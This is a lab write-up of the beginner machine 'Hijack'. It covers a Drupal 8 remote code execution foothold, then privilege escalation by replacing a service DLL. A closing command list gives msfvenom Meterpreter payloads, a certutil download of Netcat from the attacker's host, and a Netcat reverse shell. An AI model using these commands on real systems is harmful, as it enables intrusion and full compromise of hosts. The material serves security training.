Premise

In this post, we demonstrated the basic exploitation of the Drupal content management system to gain a limited shell on the remote host. We escalated our privileges by generating a custom DLL payload and replace the target DLL file with our payload. We used a lab machine called ‘Hijack’.

Machine Name: Hijack

Difficulty: Beginner

Skills Learned

  • Drupal
  • OWASP
  • DLL Injection

Finding the Way In

I started by running an Nmap scan, which revealed a web server running Drupal 8. I checked the robots.txt file for any interesting directories and then headed over to the main page. I found a login page, but instead of trying to brute-force my way in, I decided to look for a more elegant solution.

I knew that Drupal 8 had a few known remote code execution vulnerabilities, so I searched for an exploit and found a Bash script that looked promising. The script was designed to echo a simple message to a file, but I modified it to download and execute a reverse shell payload from my machine.

After a bit of trial and error with different payloads, I was able to use the exploit to download Netcat to the target machine and then use it to get a reverse shell. I now had a foothold on the machine, but I was still just a regular user.

Becoming the Admin

My next goal was to become the administrator. I started by enumerating the services running on the machine and found one called “hijack.” The name was a dead giveaway, so I decided to investigate it further.

I checked the permissions on the service’s executable file and found that I didn’t have write access. However, I did have write access to the “libraries” directory where the service stored its DLL files. This was the perfect opportunity for a DLL hijacking attack.

I used msfvenom to create a malicious DLL file with a Meterpreter payload and named it custom.dll to match the name of one of the legitimate DLLs. I then downloaded my malicious DLL to the “libraries” directory, overwriting the original file.

All that was left to do was start the “hijack” service. As soon as I did, the service loaded my malicious DLL, which executed my payload and gave me a Meterpreter session with full administrator privileges! 👑

Commands I Used

Here are some of the key commands I used during this process:

  • Searching for exploits: searchsploit drupal 8
  • Generating a Meterpreter payload: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f exe -o win.exe
  • Starting a Python web server: python -m http.server
  • Downloading a file with certutil: certutil.exe -urlcache -f http://<IP>:<PORT>/nc64.exe nc64.exe
  • Setting up a Netcat listener: nc -lvp <PORT>
  • Getting a reverse shell with Netcat: nc64.exe -e cmd.exe <IP> <PORT>
  • Checking file permissions: icacls <DIRECTORY>
  • Generating a malicious DLL: msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP> LPORT=<PORT> -f dll -o custom.dll
  • Starting a service: sc start hijack

Video Walkthrough

About the Author

Mastermind Study Notes is a group of talented authors and writers who are experienced and well-versed across different fields. The group is led by, Motasem Hamdan, who is a Cybersecurity content creator and YouTuber.

View Articles